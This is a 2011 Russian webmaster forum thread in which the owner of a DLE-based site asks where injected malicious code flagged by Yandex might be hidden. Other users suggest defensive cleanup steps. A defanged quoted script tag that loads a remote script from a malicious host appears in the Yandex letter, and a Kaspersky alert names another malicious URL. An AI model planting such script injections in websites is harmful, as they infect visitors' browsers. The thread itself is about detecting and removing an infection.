X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> В сайт внедрили ифраме код, не могу найти этот код
butcher
butcher
Topic Starter сообщение 12.1.2011, 19:56; Ответить: butcher
Сообщение #1


Здравствуйте
Яндекс ругается на вредоносный код.
вот копия письма
"Здравствуйте, Кирилл!

Приношу свои извинения за столь длительную задержку с ответом. При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:

[script language="JavaScript" charset="windows-1251" rel="nofollow" src="h**p://allbestporn.org/js/if.php?id=4"][/script]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Пожалуйста, проверьте страницы Вашего сайта и удалите вредоносный код. Вскоре после этого наш робот перепроверит Ваш сайт и, если вредоносный код более не будет обнаружен, пометка в выдаче снимется. Перечень зараженных страниц можно узнать в Яндекс.Вебмастере ( http://webmaster.yandex.ru ). "


Я не могу найти этот код, уже по всему шаблону проверил но так и не нашел.
Могут ли его в другое место какое вставить?
DLE движок

Сообщение отредактировал butcher - 12.1.2011, 19:57


--------------------
-4
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Dinamitt
Dinamitt
сообщение 12.1.2011, 20:01; Ответить: Dinamitt
Сообщение #2


butcher, могут. Например переименовать в картинку txt файл с кодом и вызывать через index.php. Проверьте даты последнего изменения файлов. Вариантов много.

Версия движка хоть какая?

Сообщение отредактировал Dinamitt - 12.1.2011, 20:04
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
butcher
butcher
Topic Starter сообщение 12.1.2011, 20:06; Ответить: butcher
Сообщение #3


мне новости добавляет один человек и закачивает скрин на сервер


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Dinamitt
Dinamitt
сообщение 12.1.2011, 20:08; Ответить: Dinamitt
Сообщение #4


Вы так и не поняли, что я имел в виду...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
zakaznik
zakaznik
сообщение 12.1.2011, 20:12; Ответить: zakaznik
Сообщение #5


можно спрятать так, что обычным поиском по адресу НИКОГДА не найдешь)

P.S. вообще, в теории, iframe может быть во многих файлах кроме шаблоновских...

Сообщение отредактировал zakaznik - 12.1.2011, 20:14
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
butcher
butcher
Topic Starter сообщение 12.1.2011, 20:14; Ответить: butcher
Сообщение #6


версия 8.3 регистрация отключена


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
zakaznik
zakaznik
сообщение 12.1.2011, 20:18; Ответить: zakaznik
Сообщение #7


антивирус на компе есть? когда на сайте подгружается код, антивирусник срабатывает?

Если срабатывает антивирус, то можно попытаться выцепить вирус...

Сообщение отредактировал zakaznik - 12.1.2011, 20:22
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
butcher
butcher
Topic Starter сообщение 12.1.2011, 20:27; Ответить: butcher
Сообщение #8


первый раз выдал касперский 12.01.2011 17:37:49 Подозрительный вредоносная ссылка "zo7h.co.cc/index.php?tp=e6da372209be9dbb"

после перезагрузил компьютер и при за ходе на сайт больше не выдавал

Сообщение отредактировал butcher - 12.1.2011, 20:29


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
auter
auter
сообщение 12.1.2011, 23:17; Ответить: auter
Сообщение #9


В самих постах проверяли этот скрипт?

Если найдете в постах - вот заплата http://dle-news.ru/bags/v90/1127-nedostato...hih-dannyh.html
Делаете откат бд, меняете пасс на админке и базе данных. И все, сайт защищен вновь.

Возникнут вопросы - аська в профиле

Сообщение отредактировал auter - 12.1.2011, 23:19
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
algaretio
algaretio
сообщение 13.1.2011, 12:18; Ответить: algaretio
Сообщение #10


в шаблоне его и нет, ищите в engine/data/там файлы конфигов. Посмотрите даты их изменения и тп. А вообще самый элементарный способ - посмотрите на даты изменения файлов + логи

Сообщение отредактировал algaretio - 13.1.2011, 12:19


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Ваш сайт блокирует Роскомнадзор?
23 hollywooduk 5096 27.3.2024, 10:43
автор: hollywooduk
Открытая тема (нет новых ответов) Тысячи ботовых переходов на сайт
18 Suagaring 4540 26.3.2024, 21:42
автор: c4p1t4l15t
Открытая тема (нет новых ответов) Блог: городской сми сайт в Прибалтике
23 kapusta1 3540 24.3.2024, 22:02
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлы[Услуги] Баннер/Графика/Сайт
238 FillPlay 179404 23.3.2024, 16:31
автор: freeax
Открытая тема (нет новых ответов) Пишет кто отзывы на сайт в янднекс с разных аккаунтах
1 TenDemon_rs 1133 22.3.2024, 13:18
автор: writer80


 



RSS Текстовая версия Сейчас: 29.3.2024, 18:11
Дизайн